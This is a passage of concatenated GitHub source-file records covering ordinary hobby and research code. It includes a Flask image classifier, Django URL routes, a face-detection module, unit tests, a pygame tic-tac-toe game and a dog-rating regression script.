img_array = expand_dims(img_array, 0) \n img_preprocessed = preprocess_input(img_array)\n\n predictions = model.predict(img_preprocessed, steps=1)\n return predictions\n\ndef get_best_prediction(predictions, n):\n top = predictions[0].argsort()[::-1][:n]\n res = {}\n for i in top:\n res[labels[str(i)][1]] = '{:.3f}'.format(predictions[0][i])\n return res\n\n\nclass ImageClassify(Resource):\n def post(self):\n data = request.get_json()\n url = data['url']\n n = data['n']\n \n # try:\n get_image(url)\n predictions = predict()\n res = get_best_prediction(predictions, n)\n print(res)\n return jsonify({\n 'status': 200,\n 'classification': res\n })\n # except:\n # return jsonify({\n # 'status': 303,\n # 'message': 'Something went wrong. You may try another image'\n # })\n\napi.add_resource(ImageClassify, '/classify')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=7693)","repo_name":"chihuangamo/imagenet-flask-api","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27897142028","text":"\"\"\"\nDefinition of urls for lenten.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nimport django.contrib.auth.views\n\nimport lentensermons.seeker.forms\nfrom lentensermons.seeker.views import *\n\n# Import from LENTENSERMONS as a whole\nfrom lentensermons.settings import APP_PREFIX\n\n# Other Django stuff\n# from django.core import urlresolvers\nfrom django.shortcuts import redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.base import RedirectView\n\nadmin.autodiscover()\n\n\n# Set admin stie information\nadmin.site.site_header = \"Lenten sermons\"\nadmin.site.site_title = \"lentensermons Admin\"\n\npfx = APP_PREFIX\n\nurlpatterns = [\n # Examples:\n url(r'^$', lentensermons.seeker.views.home, name='home'),\n url(r'^contact$', lentensermons.seeker.views.contact, name='contact'),\n url(r'^instruction$', lentensermons.seeker.views.instruction, name='instruction'),\n url(r'^about', lentensermons.seeker.views.about, name='about'),\n url(r'^short', lentensermons.seeker.views.about, name='short'),\n url(r'^nlogin', lentensermons.seeker.views.nlogin, name='nlogin'),\n\n url(r'^api/tagtext/', lentensermons.seeker.views.get_tributes, name='api_tributes'),\n url(r'^api/params/', lentensermons.seeker.views.get_params, name='api_params'),\n\n url(r'^location/list', LocationListView.as_view(), name='location_list'),\n url(r'^location/details(?:/(?P\\d+))?/$', LocationDetailsView.as_view(), name='location_details'),\n url(r'^location/edit(?:/(?P\\d+))?/$', LocationEdit.as_view(), name='location_edit'),\n url(r'^location/relset(?:/(?P\\d+))?/$', LocationRelset.as_view(), name='loc_relset'),\n\n url(r'^author/list', AuthorListView.as_view(), name='author_list'),\n url(r'^author/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/author/add'), name='author_add'),\n url(r'^author/view(?:/(?P\\d+))?/$', AuthorDetailsView.as_view(), name='author_details'),\n\n # url(r'^sermon/list', SermonListView.as_view(), name='sermon_list'),\n url(r'^sermon/list', SermonList.as_view(), name='sermon_list'),\n url(r'^sermon/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/sermon/add'), name='sermon_add'),\n url(r'^sermon/view(?:/(?P\\d+))?/$', SermonDetailsView.as_view(), name='sermon_details'),\n\n url(r'^collection/list', CollectionList.as_view(), name='collection_list'),\n url(r'^collection/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/sermoncollection/add'), name='collection_add'),\n url(r'^collection/view(?:/(?P\\d+))?/$', CollectionDetailsView.as_view(), name='collection_details'),\n\n url(r'^manuscript/list', ManuscriptListView.as_view(), name='manuscript_list'),\n url(r'^manuscript/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/manuscript/add'), name='manuscript_add'),\n url(r'^manuscript/view(?:/(?P\\d+))?/$', ManuscriptDetailsView.as_view(), name='manuscript_details'),\n\n url(r'^edition/list', EditionList.as_view(), name='edition_list'),\n url(r'^edition/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/edition/add'), name='edition_add'),\n url(r'^edition/view(?:/(?P\\d+))?/$', EditionDetailsView.as_view(), name='edition_details'),\n\n url(r'^concept/list', ConceptListView.as_view(), name='concept_list'),\n url(r'^concept/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/concept/add'), name='concept_add'),\n url(r'^concept/view(?:/(?P\\d+))?/$', ConceptDetailsView.as_view(), name='concept_details'),\n\n url(r'^tag/group/list', TgroupListView.as_view(), name='tgroup_list'),\n url(r'^tag/group/edit(?:/(?P\\d+))?/$', TgroupEdit.as_view(), name='tgroup_edit'),\n url(r'^tag/group/view(?:/(?P\\d+))?/$', TgroupDetails.as_view(), name='tgroup_details'),\n\n url(r'^tag/keyword/list', TagKeywordListView.as_view(), name='tagkeyword_list'),\n url(r'^tag/keyword/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/tagkeyword/add'), name='tagkeyw_add'),\n url(r'^tag/keyword/view(?:/(?P\\d+))?/$', TagKeywordDetailView.as_view(), name='tagkeyword_details'),\n\n url(r'^publisher/list', PublisherListView.as_view(), name='publisher_list'),\n url(r'^publisher/view(?:/(?P\\d+))?/$', PublisherDetailsView.as_view(), name='publisher_details'),\n url(r'^publisher/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/publisher/add'), name='publisher_add'),\n\n url(r'^news/list', NewsListView.as_view(), name='newsitem_list'),\n url(r'^news/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/newsitem/add'), name='newsitem_add'),\n url(r'^news/view(?:/(?P\\d+))?/$', NewsDetailsView.as_view(), name='newsitem_details'),\n\n url(r'^instruction/list', InstructionListView.as_view(), name='instruction_list'),\n url(r'^instruction/edit(?:/(?P\\d+))?/$', InstructionEdit.as_view(), name='instruction_edit'),\n url(r'^instruction/view(?:/(?P\\d+))?/$', InstructionDetails.as_view(), name='instruction_details'),\n\n url(r'^reference/list', LitrefListView.as_view(), name='litref_list'),\n url(r'^reference/view(?:/(?P\\d+))?/$', LitrefDetailsView.as_view(), name='litref_details'),\n url(r'^reference/edit(?:/(?P\\d+))?/$', LitrefEditView.as_view(), name='litref_edit'),\n\n url(r'^consulting/view(?:/(?P\\d+))?/$', ConsultingDetailsView.as_view(), name='consulting_details'),\n url(r'^consulting/add', RedirectView.as_view(url='/'+APP_PREFIX+'admin/seeker/consulting/add'), name='consulting_add'),\n\n url(r'^report/list', ReportListView.as_view(), name='report_list'),\n url(r'^report/details(?:/(?P\\d+))?/$', ReportDetailsView.as_view(), name='report_details'),\n\n # For working with ModelWidgets from the select2 package https://django-select2.readthedocs.io\n url(r'^select2/', include('django_select2.urls')),\n\n url(r'^definitions$', RedirectView.as_view(url='/'+pfx+'admin/'), name='definitions'),\n url(r'^signup/$', lentensermons.seeker.views.signup, name='signup'),\n\n url(r'^login/user/(?P\\w[\\w\\d_]+)$', lentensermons.seeker.views.login_as_user, name='login_as'),\n\n url(r'^login/$', LoginView.as_view\n (\n template_name= 'login.html',\n authentication_form= lentensermons.seeker.forms.BootstrapAuthenticationForm,\n extra_context= {'title': 'Log in','year': datetime.now().year,}\n ),\n name='login'),\n url(r'^logout$', LogoutView.as_view(next_page=reverse_lazy('home')), name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', admin.site.urls, name='admin_base'),\n]\n","repo_name":"ErwinKomen/RU-lenten","sub_path":"lenten/lentensermons/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10312248873","text":"\"\"\"\nCustom middleware\n\"\"\"\nimport time\nimport logging\nimport re\n\nfrom django.conf import settings\n\nfrom .utils import sql_unmonitoring_this_thread\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass LongRequestMiddleware(object):\n\n \"\"\"Long request middleware, remember to put it first\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize timeout with PATCHY_LONG_REQUEST_TIMEOUT with default to one second\n \"\"\"\n self.ignore_url_patterns = getattr(settings, 'PATCHY_LONG_REQUEST_IGNORE_URLS', list())\n # skip any sql timeout mornitoring if lr is ignored\n self.stick_to_lr = getattr(settings, 'PATCHY_STICK_TO_LR', True)\n self.timeout = getattr(settings, 'PATCHY_LONG_REQUEST_TIMEOUT', 1)\n\n def process_request(self, request):\n \"\"\"record the time in\n \"\"\"\n self._start = time.time()\n\n self.url_matched = False\n for url_pattern in self.ignore_url_patterns:\n # if the current path in ignored url list, just ignore it\n if re.match(url_pattern, request.path):\n self.url_matched = True\n if self.stick_to_lr:\n sql_unmonitoring_this_thread()\n break\n\n def process_response(self, request, response):\n \"\"\"record the time out\n \"\"\"\n self._end = time.time()\n elapsed = self._end - self._start\n if elapsed > self.timeout and not self.url_matched:\n # too long and log to target\n logger.error('[Long Request]Path: %s, Time: %s s' % (request.path, elapsed))\n\n response['X-ELAPSED'] = elapsed\n return response\n","repo_name":"jian-en/django-patchy","sub_path":"patchy/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"3450602353","text":"import cv2 as cv\nimport time\n#pTime=0\nimport mediapipe as mp\nclass FaceDetection():\n def __init__(self,minDetectionCon=0.98):\n self.minDetectionCon=minDetectionCon\n\n self.mpFaceDetect = mp.solutions.face_detection\n self.face = self.mpFaceDetect.FaceDetection(minDetectionCon)\n self.mpDraw = mp.solutions.drawing_utils\n\n def findFaces(self,img,draw=True ):\n bboxs=[]\n imgRGB = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n self.results = self.face.process(imgRGB)\n if self.results.detections:\n\n for id, detection in enumerate(self.results.detections):\n # mpDraw.draw_detection(img,detection)\n # print(detection.score)\n # print(detection.location_data.relative_bounding_box)\n bboxC = detection.location_data.relative_bounding_box\n h, w, c = img.shape\n bbox = int(bboxC.xmin * w), int(bboxC.ymin\n * h), \\\n int(bboxC.width * w), int(bboxC.height * h)\n img=self.fancyDraw(img,bbox)####Even Methods needs to be referenced with (self)\n cv.putText(img, f\"conf:{int(detection.score[0] * 100)}%\", (bbox[0] - 10, bbox[1] - 10),\n cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)\n bboxs.append([id,bbox,detection.score])\n\n\n return img,bboxs\n\n\n def fancyDraw (self,img,bbox,l=30,t=10):\n x,y,w,h,=bbox\n x1,y1=x+w,y+h\n cv.line(img,(x,y),(x+l,y),(255,0,230),t)\n cv.line(img, (x1-l, y1), (x1,y1), (255, 0, 230), t)\n cv.rectangle(img, (bbox[0], bbox[1]), (bbox[0] + bbox[2], bbox[1] + bbox[3]), (255, 0, 255), 2)\n return img\n\n\ndef main():\n cap=cv.VideoCapture(0)\n pTime=0\n faceDetect=FaceDetection()\n\n while True:\n succes,img=cap.read()\n img,lst=faceDetect.findFaces(img)\n print(lst)\n\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n cv.putText(img, \"fps\" + str(int(fps)), (30, 70), cv.FONT_ITALIC, 1, (0, 255, 0), 2)\n cv.imshow(\"img\", img)\n cv.waitKey(1) # speed increased\n#####\nif __name__==\"__main__\":\n main()","repo_name":"KatarSaad/aiProject","sub_path":"FaceModule.py","file_name":"FaceModule.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39474590080","text":"import branch_utility\nimport unittest\nimport test_urlfetch\n\nclass BranchUtilityTest(unittest.TestCase):\n def testSplitChannelNameFromPath(self):\n self.assertEquals(('dev', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'dev/hello/stuff.html'))\n self.assertEquals(('beta', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'beta/hello/stuff.html'))\n self.assertEquals(('trunk', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'trunk/hello/stuff.html'))\n self.assertEquals(('stable', 'hello/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'hello/stuff.html'))\n self.assertEquals(('stable', 'hello/dev/stuff.html'),\n branch_utility.SplitChannelNameFromPath(\n 'hello/dev/stuff.html'))\n\n def testGetBranchNumberForChannelName(self):\n base_path = 'branch_utility/first.json'\n self.assertEquals('1132',\n branch_utility.GetBranchNumberForChannelName('dev',\n test_urlfetch,\n base_path))\n self.assertEquals('1084',\n branch_utility.GetBranchNumberForChannelName('beta',\n test_urlfetch,\n base_path))\n self.assertEquals('1234',\n branch_utility.GetBranchNumberForChannelName('stable',\n test_urlfetch,\n base_path))\n self.assertEquals('trunk',\n branch_utility.GetBranchNumberForChannelName('trunk',\n test_urlfetch,\n base_path))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"xiaosophiawang/WProf","sub_path":"chrome/src/chrome/common/extensions/docs/server2/branch_utility_test.py","file_name":"branch_utility_test.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"10487370729","text":"import sph_stub\nimport numpy as np\n\ndef test_grid():\n ''' Tests if the initial grid has been populated by particles\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n domain.initialise_grid()\n domain.place_points(domain.min_x, domain.max_x)\n domain.allocate_to_grid()\n \n x_value = []\n y_value = []\n \n for particle in domain.particle_list:\n x_value.append(particle.x[0])\n y_value.append(particle.x[1])\n\n assert len(x_value) != 0\n assert len(y_value) != 0\n\ndef test_speed():\n ''' Tests if any particles have exceeded the speed of sound\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n\n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log:\n #assert particle.v[0] == 0\n #assert particle.v[1] == 0\n assert particle.v[0] <= domain.c0\n assert particle.v[1] <= domain.c0\n \n \ndef test_density():\n ''' Tests if a negative density has been given and whether any\n particle density has exceeded the reference density by a factor of 1.5\n '''\n domain = sph_stub.SPH_main()\n domain.set_values()\n \n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log: \n assert particle.rho > 0\n assert particle.rho<= 1.5 * domain.rho0\n\ndef test_mass_conserve():\n ''' Tests whether any particles have fallen out of the initial domain\n '''\n \n domain = sph_stub.SPH_main()\n domain.set_values()\n domain.initialise_grid()\n x_min = domain.min_x[0]\n x_max = domain.max_x[0]\n y_min = domain.min_x[1]\n y_max = domain.max_x[1]\n \n solutions = np.load('State.npy')\n \n for log in solutions:\n for particle in log:\n if particle.boundary is not True:\n assert x_min <= particle.x[0] <= x_max\n assert y_min <= particle.x[1] <= y_max\n\n ","repo_name":"olivboom/SPH-solver","sub_path":"pytest_SPH.py","file_name":"pytest_SPH.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25847652550","text":"\"\"\"\n1. bfs로 인구수, 연합나라, 좌표 저장\n2. 인구수 차이값이 l이상 r 이하이면 visit\n3. move_q를 통해 좌표 불러와서 총 인구수를 총 나라수로 나눈 값으로 변경(이 부분 구현실패)\n4. 연합 여부를 반환해서 확인\n5. 방문 안한 모든 나라 bfs로 검사\n bfs 0이면 더이상 연합할 수 없음 --> bfs 모두 더했을 때 0이면 연합한 횟수를 출력\nhttps://chldkato.tistory.com/126\n\"\"\"\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef bfs(x, y):\n move_q = deque()\n q.append([x, y])\n c[x][y] = 1\n people, cnt = 0, 0\n while q:\n x, y = q.popleft()\n move_q.append([x, y])\n people += a[x][y]\n cnt += 1\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n and not c[nx][ny]:\n if l <= abs(a[x][y] - a[nx][ny]) <= r:\n c[nx][ny] = cnt\n q.append([nx, ny])\n\n while move_q:\n x, y = move_q.popleft()\n a[x][y] = people // cnt\n\n if cnt == 1:\n return 0\n return 1\n\nn, l, r = map(int, input().split())\na = [list(map(int, input().split())) for _ in range(n)]\n\nans = 0\nwhile 1:\n q = deque()\n c = [[0]*n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if not c[i][j]:\n cnt += bfs(i, j)\n if not cnt:\n break\n ans += 1\n\nprint(ans)","repo_name":"hyun-young/algorithm_study_hy","sub_path":"step-by-step/구현/boj 16234 인구 이동(참고).py","file_name":"boj 16234 인구 이동(참고).py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7405593676","text":"from icommandlib.utils import stripshot\n\n\nclass ICommandError(Exception):\n pass\n\n\nclass IProcessTimeout(ICommandError):\n MESSAGE = \"Timed out after {timeout} seconds:\\n\\n{stripshot}\"\n\n def __init__(self, timeout, stripshot):\n self.timeout = timeout\n self.stripshot = stripshot\n\n super(IProcessTimeout, self).__init__(\n self.MESSAGE.format(\n timeout=self.timeout,\n stripshot=self.stripshot,\n )\n )\n\n\nclass IProcessExitError(ICommandError):\n def __init__(self, exit_code, screenshot):\n self.exit_code = exit_code\n self.screenshot = screenshot\n\n super(IProcessExitError, self).__init__(\n self.MESSAGE.format(\n exit_code=self.exit_code, screenshot=stripshot(self.screenshot)\n )\n )\n\n\nclass UnexpectedExit(IProcessExitError):\n MESSAGE = (\n \"Process unexpectedly exited with \"\n \"exit code {exit_code}. Output:\\n{screenshot}\"\n )\n\n\nclass AlreadyExited(IProcessExitError):\n MESSAGE = \"Process already exited with {exit_code}. \" \"Output:\\n{screenshot}\"\n\n\nclass ExitWithError(IProcessExitError):\n MESSAGE = (\n \"Process exited with non-zero exit code {exit_code}. \" \"Output:\\n{screenshot}\"\n )\n","repo_name":"crdoconnor/icommandlib","sub_path":"icommandlib/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23343337961","text":"#!/usr/bin/env python\n\nimport os\n\n\ndef find_dupes(my_dir='.'):\n myfiles = set(os.listdir(my_dir))\n myfiles_lower = set()\n\n i_duplicated = 0\n for myfile in myfiles:\n lower = myfile.lower()\n if lower in myfiles_lower:\n i_duplicated += 1\n print('\\033[91m%s\\033[0m differs only by case! Change its name.' %\n myfile)\n else:\n myfiles_lower.add(lower)\n return i_duplicated\n\n\nif __name__ == \"__main__\":\n n = find_dupes()\n print(n)\n","repo_name":"Amber-MD/pytraj","sub_path":"tests/data/find_dupes.py","file_name":"find_dupes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"79"} +{"seq_id":"70054827135","text":"import pygame\r\nfrom pygame import gfxdraw\r\npygame.init()\r\n\r\nwhite = (255, 255, 255)\r\nblack = (0, 0, 0)\r\nblue = (3, 206, 252)\r\ngreen = (0, 255, 0)\r\nred = (255, 0, 0)\r\n\r\n\r\ndisplay = pygame.display.set_mode((500, 550)) # set display size\r\npygame.display.set_caption(\"Tic Tac Toe\")\r\n\r\n\r\ndef message_display(text, color, x=80, y=525, size=32):\r\n font = pygame.font.Font('freesansbold.ttf', size) # set font\r\n text_surface = font.render(text, True, color)\r\n text_rect = text_surface.get_rect()\r\n text_rect.center = int(x), int(y)\r\n display.blit(text_surface, text_rect)\r\n\r\ndef game_loop():\r\n display.fill(white) # set display color\r\n first = pygame.draw.rect(display, blue, (0, 0, 160, 160)) # draws rectangles for buttons\r\n second = pygame.draw.rect(display, blue, (170, 0, 160, 160))\r\n third = pygame.draw.rect(display, blue, (340, 0, 160, 160))\r\n fourth = pygame.draw.rect(display, blue, (0, 170, 160, 160))\r\n fifth = pygame.draw.rect(display, blue, (170, 170, 160, 160))\r\n sixth = pygame.draw.rect(display, blue, (340, 170, 160, 160))\r\n seventh = pygame.draw.rect(display, blue, (0, 340, 160, 160))\r\n eighth = pygame.draw.rect(display, blue, (170, 340, 160, 160))\r\n ninth = pygame.draw.rect(display, blue, (340, 340, 160, 160))\r\n\r\n pygame.draw.rect(display, blue, (0, 0, 500, 15)) # draws borders\r\n pygame.draw.rect(display, blue, (0, 0, 15, 500))\r\n pygame.draw.rect(display, blue, (0, 485, 500, 15))\r\n pygame.draw.rect(display, blue, (485, 0, 15, 500))\r\n\r\n rectangles = [[first, second, third], # list of rectangles\r\n [fourth, fifth, sixth],\r\n [seventh, eighth, ninth]]\r\n\r\n board = [[' ', ' ', ' '], # list to hold game board\r\n [' ', ' ', ' '],\r\n [' ', ' ', ' ']]\r\n\r\n # anti aliased circle function\r\n def draw_circle(surface, x, y, radius, color):\r\n gfxdraw.aacircle(surface, x, y, radius, color)\r\n gfxdraw.filled_circle(surface, x, y, radius, color)\r\n\r\n \"\"\"def draw_marker(letter, rect): # draws player markers\r\n if letter == \"O\":\r\n pygame.draw.circle(display, white, (80 + rect.x, 80 + rect.y), 60)\r\n pygame.draw.circle(display, blue, (80 + rect.x, 80 + rect.y), 40)\r\n elif letter == \"X\":\r\n pygame.draw.rect(display, white, (30 + rect.x, 30 + rect.y, 100, 100))\"\"\"\r\n\r\n def draw_marker2(letter, rect):\r\n if letter == 'O':\r\n draw_circle(display, 80 + rect.x, 80 + rect.y, 60, white)\r\n draw_circle(display, 80 + rect.x, 80 + rect.y, 40, blue)\r\n elif letter == 'X':\r\n message_display('X', white, x=80 + rect.x, y=90 + rect.y, size=150)\r\n\r\n def draw_board():\r\n for rect_row, board_row in zip(rectangles, board):\r\n for rect, marker in zip(rect_row, board_row): # zips board positions to respective rectangles\r\n if marker == 'X': # references board list to update game display\r\n draw_marker2(\"X\", rect)\r\n elif marker == 'O':\r\n draw_marker2(\"O\", rect)\r\n\r\n def get_move(mouse_pos): # determines which rectangle was clicked\r\n for i, rect_row in enumerate(rectangles):\r\n for j, rect in enumerate(rect_row):\r\n if rect.collidepoint(mouse_pos):\r\n return i, j # returns indexes of rectangle that was clicked\r\n\r\n def winner(): # check for a winner. Only works for 3 x 3 board\r\n for row in board: # check horizontals\r\n if row[0] == row[1] == row[2] and row[0] != ' ':\r\n return row[0]\r\n\r\n for col in range(3): # check verticals\r\n if board[0][col] == board[1][col] == board[2][col] and board[0][col] != ' ':\r\n return board[0][col]\r\n\r\n if board[0][0] == board[1][1] == board[2][2] and board[0][0] != ' ': # check diagonals\r\n return board[0][0]\r\n if board[0][2] == board[1][1] == board[2][0] and board[0][2] != ' ':\r\n return board[0][2]\r\n\r\n turn_count = 0\r\n while True:\r\n\r\n pygame.time.delay(50)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n try:\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if winner() is None:\r\n pos = pygame.mouse.get_pos()\r\n row, col = get_move(pos)\r\n if board[row][col] == ' ':\r\n if turn_count % 2 == 0:\r\n player = \"X\"\r\n else:\r\n player = \"O\"\r\n board[row][col] = player\r\n turn_count += 1\r\n draw_board()\r\n except TypeError:\r\n pass\r\n if winner() is not None:\r\n message_display(f\"{winner()} wins!\", black)\r\n button(\"Play again\", green, 175, 505, 175, 40, game_loop)\r\n button(\"Quit\", red, 375, 505, 100, 40, quit_game)\r\n elif turn_count == 9:\r\n message_display(\"Tie!\", black)\r\n button(\"Play again\", green, 175, 505, 175, 40, game_loop)\r\n button(\"Quit\", red, 375, 505, 100, 40, quit_game)\r\n\r\n pygame.display.update()\r\n\r\n\r\ndef button(message, color, x, y, width, height, func=None):\r\n pos = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n\r\n pygame.draw.rect(display, color, (x, y, width, height))\r\n message_display(message, black, x + width/2, y + height/2)\r\n\r\n if x+width > pos[0] > x and y+height > pos[1] > y and click[0] == 1 and func is not None:\r\n func()\r\n\r\ndef quit_game():\r\n pygame.quit()\r\n quit()\r\n\r\ndef game_intro():\r\n while True:\r\n\r\n pygame.time.delay(50)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n display.fill(white)\r\n message_display(\"Tic-tac-toe\", black, 250, 230, 75)\r\n\r\n button(\"Play\", green, 75, 300, 150, 50, game_loop)\r\n button(\"Quit\", red, 275, 300, 150, 50, quit_game)\r\n\r\n pygame.display.update()\r\n\r\ngame_intro()\r\npygame.quit()\r\n","repo_name":"PotatoShavings/CB-South-Coding-Club","sub_path":"tictac_pygame.py","file_name":"tictac_pygame.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"188560399","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/28 18:24\n# @Author : panxiaotong\n# @Description : extract movie review sentiment data from mc dataset\n\nimport sys\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"extract_from_movie_review \")\n sys.exit()\n\n word_dict = {}\n with open(sys.argv[2], 'r') as f:\n for line in f:\n elements = line.strip('\\r\\n').split('\\t')\n word_dict[elements[0]] = elements[1]\n f.close()\n output_file = open(sys.argv[3], 'w')\n with open(sys.argv[1], 'r') as f:\n for idx, line in enumerate(f):\n if idx == 0:\n continue\n elements = line.strip('\\r\\n').split('\\t')\n words = [item for item in elements[2] if item.strip() != \"\"]\n sent_ids = []\n for word in words:\n sent_ids.append(\"0\" if word not in word_dict else str(word_dict[word]))\n if sent_ids.count(\"0\") != len(sent_ids):\n output_file.write(\",\".join(sent_ids) + \"\\t\" + elements[3] + \"\\n\")\n f.close()\n output_file.close()","repo_name":"Hins/prob_skip_gram","sub_path":"src/data/eval_data/extract_from_movie_review.py","file_name":"extract_from_movie_review.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36882605681","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nfrom scipy import stats\n\ndef to_timestamp(d):\n return d.timestamp()\n\n\n# In[2]:\n\n\ndata = pd.read_csv('dog_rates_tweets.csv',parse_dates=[1])\n\n\n# In[3]:\n\n\ndata['rating'] = data['text'].str.extract(r'(\\d+(\\.\\d+)?)/10', expand = False)[0]\n#print(data)\ndata = data.dropna()\n#print(data)\n\n\n# In[4]:\n\n\ndata['rating'] = data['rating'].astype(float)\ndata = data[data['rating'] <= 25]\n#print(data)\n\n\n# In[5]:\n\n\ndata['timestamp'] = data['created_at'].apply(to_timestamp)\nfit = stats.linregress(data['timestamp'],data['rating'])\n#print (data)\n\n\n# In[6]:\n\n\ndata['prediction'] = data['timestamp']*fit.slope + fit.intercept\n\n\n# In[7]:\n\n\nfit.slope, fit.intercept\n\n\n# In[8]:\n\n\nplt.xticks(rotation=115)\nplt.plot(data['created_at'],data['rating'],'b.',alpha=0.5)\nplt.plot(data['created_at'], data['prediction'], 'r-', linewidth=3)\nplt.show()\n\n\n# In[9]:\n\n\np = fit.pvalue\nprint('P-value for dog rates is')\nprint(p)\n\n\n# In[10]:\n\n\nresidual = data['rating'] - data['prediction']\nprint(residual)\n\n\n# In[11]:\n\n\nplt.hist(residual)\n\n","repo_name":"erwinbai/Data-Science-353","sub_path":"e7/dog-rates.py","file_name":"dog-rates.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22582078624","text":"from collections import deque as dq\nimport sys\ninput = lambda: sys.stdin.readline().rstrip()\n\n# sys.stdin = open('in2.txt')\n# sys.stdin = open('dna/08_dynamic_programming/07-08_alibaba_and_40_thieves/in1.txt')\n\nn = int(input())\ncost = [list(map(int, input().split())) for _ in range(n)]\n\ndp = [[0]*n for _ in range(n)]\n# 0행, 0열의 값들 초기화\ndp[0][0] = cost[0][0]\nfor i in range(1, n):\n dp[0][i] = dp[0][i-1] + cost[0][i]\n dp[i][0] = dp[i-1][0] + cost[i][0]\n\n\n# Bottom-up\n# for row in range(1, n):\n# for col in range(1, n):\n# # 최단거리로 이동하므로 오른쪽 또는 아래 방향으로만 움직인다.\n# dp[row][col] = min(dp[row-1][col], dp[row][col-1]) + cost[row][col]\n# print(dp[n-1][n-1])\n\n# Top-down\n\ndef dfs(row, col):\n # Memoization\n if dp[row][col]:\n return dp[row][col]\n\n if row == 0 and col == 0:\n dp[row][col] = cost[row][col]\n elif row == 0:\n dp[row][col] = dfs(row, col-1) + cost[row][col]\n elif col == 0:\n dp[row][col] = dfs(row-1, col) + cost[row][col]\n else:\n dp[row][col] = min(dfs(row-1, col), dfs(row, col-1)) + cost[row][col]\n return dp[row][col]\n\n\nprint(dfs(n-1, n-1))","repo_name":"ohdnf/algorithms","sub_path":"dna/08_dynamic_programming/07-08_alibaba_and_40_thieves/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21149376722","text":"import time\nimport pandas as pd\nimport numpy as np\n\nplace = pd.Series(['chicago.csv', 'new_york_city.csv', 'washington.csv'], ['wind', 'apple', 'rain'])\nmonths = ['january', 'febuary', 'march', 